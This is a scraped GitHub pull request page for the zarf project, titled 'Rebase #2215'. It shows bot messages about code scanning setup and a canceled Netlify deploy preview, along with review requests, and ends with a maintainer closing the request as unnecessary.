This pull request sets up GitHub code scanning for this repository. Once the scans have completed and the checks have passed, the analysis results for this pull request branch will appear on this overview. Once you merge this pull request, the 'Security' tab will show more code scanning analysis results (for example, for the default branch). Depending on your configuration and choice of analysis tool, future pull requests will be annotated with code scanning analysis results. For more information about GitHub code scanning, check out the documentation.

netlify · 2024-01-06T02:15:21Z

✅ Deploy Preview for zarf-docs canceled.

Name	Link
🔨 Latest commit	`193314b`
🔍 Latest deploy log	https://app.netlify.com/sites/zarf-docs/deploys/6598b7b7c9b1ff00083abfe4

Racer159 · 2024-01-06T02:18:30Z

closing as not necessary

renovate bot and others added 24 commits December 14, 2023 12:55

jbrewer3 requested a review from jeff-mccoy as a code owner January 6, 2024 02:15

jbrewer3 requested review from Racer159, Noxsios, lucasrod16 and mike-winberry as code owners January 6, 2024 02:15

jbrewer3 requested review from Madeline-UX and a team as code owners January 6, 2024 02:15

Racer159 closed this Jan 6, 2024

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Rebase #2215

Rebase #2215

jbrewer3 commented Jan 6, 2024

github-advanced-security bot commented Jan 6, 2024

netlify bot commented Jan 6, 2024 •

edited

Loading

Racer159 commented Jan 6, 2024

Rebase #2215

Rebase #2215

Conversation

jbrewer3 commented Jan 6, 2024

Description

Related Issue

Type of change

Checklist before merging

github-advanced-security bot commented Jan 6, 2024

netlify bot commented Jan 6, 2024 • edited Loading

✅ Deploy Preview for zarf-docs canceled.

Racer159 commented Jan 6, 2024

netlify bot commented Jan 6, 2024 •

edited

Loading